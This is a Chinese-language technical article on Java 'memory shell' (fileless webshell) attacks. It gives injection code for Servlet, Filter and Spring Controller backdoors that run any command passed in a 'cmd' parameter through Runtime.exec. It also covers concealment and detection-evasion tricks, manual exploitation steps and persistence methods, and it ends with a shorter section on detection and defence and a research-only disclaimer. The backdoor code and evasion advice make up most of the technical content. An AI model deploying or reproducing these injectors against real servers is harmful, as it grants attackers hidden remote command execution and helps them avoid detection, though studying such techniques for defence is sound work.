内存马 GetShell 攻击技术分析<\/h1>

一、内存马概述<\/h2>
内存马（Memory Shell）是一种驻留在内存中的后门技术，相比传统Webshell具有以下特点：<\/p>
无文件落地，仅存在于内存中<\/li>
难以被传统安全设备检测<\/li>
重启后失效（非持久化）<\/li>
通常通过漏洞利用或特殊API注入<\/li> <\/ul>
二、攻击流程分析<\/h2>

1. 漏洞利用入口<\/h3>
攻击通常始于以下入口之一：<\/p>
反序列化漏洞（如Fastjson、Jackson）<\/li>
文件上传漏洞（绕过检查上传恶意类）<\/li>
框架特定漏洞（如Spring Cloud Gateway RCE）<\/li> <\/ul>
2. 内存马注入技术<\/h3>

2.1 Servlet API 型内存马<\/h4>
\/\/ 获取当前Context
<\/span><\/span><\/span><\/span>WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>().<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取StandardContext
<\/span><\/span><\/span><\/span>Field contextField =<\/span> context.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>contextField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>ApplicationContext applicationContext =<\/span> (<\/span>ApplicationContext)<\/span>contextField.<\/span>get<\/span>(<\/span>context);<\/span>
<\/span><\/span>
<\/span><\/span>Field standardContextField =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>standardContextField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span>standardContextField.<\/span>get<\/span>(<\/span>applicationContext);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建恶意Servlet
<\/span><\/span><\/span><\/span>Servlet servlet =<\/span> new<\/span> Servlet()<\/span> {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> service<\/span>(<\/span>ServletRequest req,<\/span> ServletResponse res)<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意代码
<\/span><\/span><\/span><\/span>        String cmd =<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        if<\/span>(<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            }<\/span> catch<\/span>(<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他必要方法实现...
<\/span><\/span><\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 注册Servlet
<\/span><\/span><\/span><\/span>Wrapper wrapper =<\/span> standardContext.<\/span>createWrapper<\/span>();<\/span>
<\/span><\/span>wrapper.<\/span>setServlet<\/span>(<\/span>servlet);<\/span>
<\/span><\/span>wrapper.<\/span>setName<\/span>(<\/span>"evilServlet"<\/span>);<\/span>
<\/span><\/span>standardContext.<\/span>addChild<\/span>(<\/span>wrapper);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 添加URL映射
<\/span><\/span><\/span><\/span>standardContext.<\/span>addServletMappingDecoded<\/span>(<\/span>"\/evil"<\/span>,<\/span> "evilServlet"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.2 Filter 型内存马<\/h4>
\/\/ 创建恶意Filter
<\/span><\/span><\/span><\/span>Filter filter =<\/span> new<\/span> Filter()<\/span> {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> {<\/span>
<\/span><\/span>        String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        if<\/span>(<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            }<\/span> catch<\/span>(<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他必要方法实现...
<\/span><\/span><\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 动态注册Filter
<\/span><\/span><\/span><\/span>Dynamic addedFilter =<\/span> servletContext.<\/span>addFilter<\/span>(<\/span>"evilFilter"<\/span>,<\/span> filter);<\/span>
<\/span><\/span>addedFilter.<\/span>addMappingForUrlPatterns<\/span>(<\/span>EnumSet.<\/span>of<\/span>(<\/span>DispatcherType.<\/span>REQUEST<\/span>),<\/span> true<\/span>,<\/span> "\/*"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2.3 Controller 型内存马（Spring框架）<\/h4>
\/\/ 获取RequestMappingHandlerMapping
<\/span><\/span><\/span><\/span>RequestMappingHandlerMapping handlerMapping =<\/span> applicationContext.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建恶意处理器
<\/span><\/span><\/span><\/span>Method method =<\/span> this<\/span>.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"evilMethod"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>RequestMappingInfo mappingInfo =<\/span> RequestMappingInfo
<\/span><\/span>    .<\/span>paths<\/span>(<\/span>"\/evil"<\/span>)<\/span>
<\/span><\/span>    .<\/span>methods<\/span>(<\/span>RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>    .<\/span>build<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 注册控制器
<\/span><\/span><\/span><\/span>handlerMapping.<\/span>registerMapping<\/span>(<\/span>
<\/span><\/span>    mappingInfo,<\/span>
<\/span><\/span>    this<\/span>,<\/span>
<\/span><\/span>    method
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 恶意方法
<\/span><\/span><\/span><\/span>public<\/span> void<\/span> evilMethod<\/span>(<\/span>@RequestParam<\/span> String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 隐蔽技术<\/h3>

随机路径<\/strong>：使用UUID生成动态URL<\/li>
编码混淆<\/strong>：Base64、Hex等编码关键字符串<\/li>
反射调用<\/strong>：避免直接调用敏感API<\/li>
内存清理<\/strong>：注入后删除临时类\/对象引用<\/li>
<\/ul>
三、工具与利用<\/h2>
1. JavaExploit 工具关键功能<\/h3>

自动化漏洞检测<\/li>
多类型内存马生成（Servlet\/Filter\/Controller）<\/li>
反序列化Gadget集成<\/li>
动态类加载支持<\/li>
<\/ul>
2. 手工利用步骤<\/h3>

确认目标框架\/中间件版本<\/li>
选择合适的漏洞利用方式<\/li>
构造恶意类字节码<\/li>
通过ClassLoader动态加载<\/li>
注入内存马<\/li>
测试后门访问<\/li>
<\/ol>
四、防御措施<\/h2>
1. 检测方法<\/h3>

内存扫描<\/strong>：使用Java Agent技术检测异常类\/方法<\/li>
行为监控<\/strong>：

异常的URL映射添加<\/li>
动态类加载行为<\/li>
反射调用敏感API<\/li>
<\/ul>
<\/li>
流量分析<\/strong>：

异常的HTTP参数（如cmd、exec等）<\/li>
非常规URL访问模式<\/li>
<\/ul>
<\/li>
<\/ul>
2. 防护方案<\/h3>

输入验证<\/strong>：严格过滤反序列化数据<\/li>
权限控制<\/strong>：限制动态类加载能力<\/li>
运行时保护<\/strong>：

禁用危险的反射调用<\/li>
监控Servlet\/Filter动态注册<\/li>
<\/ul>
<\/li>
补丁管理<\/strong>：及时更新框架\/中间件<\/li>
<\/ul>
五、高级技巧<\/h2>
1. 持久化技术<\/h3>

利用Tomcat的ServletContainerInitializer<\/code><\/li>
修改web.xml<\/code>内存结构<\/li>
注入到共享类加载器<\/li>
<\/ul>
2. 绕过检测<\/h3>

使用合法类名伪装<\/li>
延迟加载技术<\/li>
基于JNDI的动态解析<\/li>
<\/ul>
3. 跨环境适配<\/h3>

针对不同Web容器（Tomcat\/Jetty\/Undertow）的适配<\/li>
Spring Boot\/Cloud特殊处理<\/li>
云原生环境下的注入方式<\/li>
<\/ul>
六、参考工具<\/h2>

JavaExploit<\/strong>：集成化漏洞利用框架<\/li>
MemShellScanner<\/strong>：内存马检测工具<\/li>
Arthas<\/strong>：Java诊断工具可用于检测异常类<\/li>
RASP<\/strong>：运行时应用自我保护方案<\/li>
<\/ol>
注：本文仅供安全研究学习使用，请勿用于非法用途。<\/p>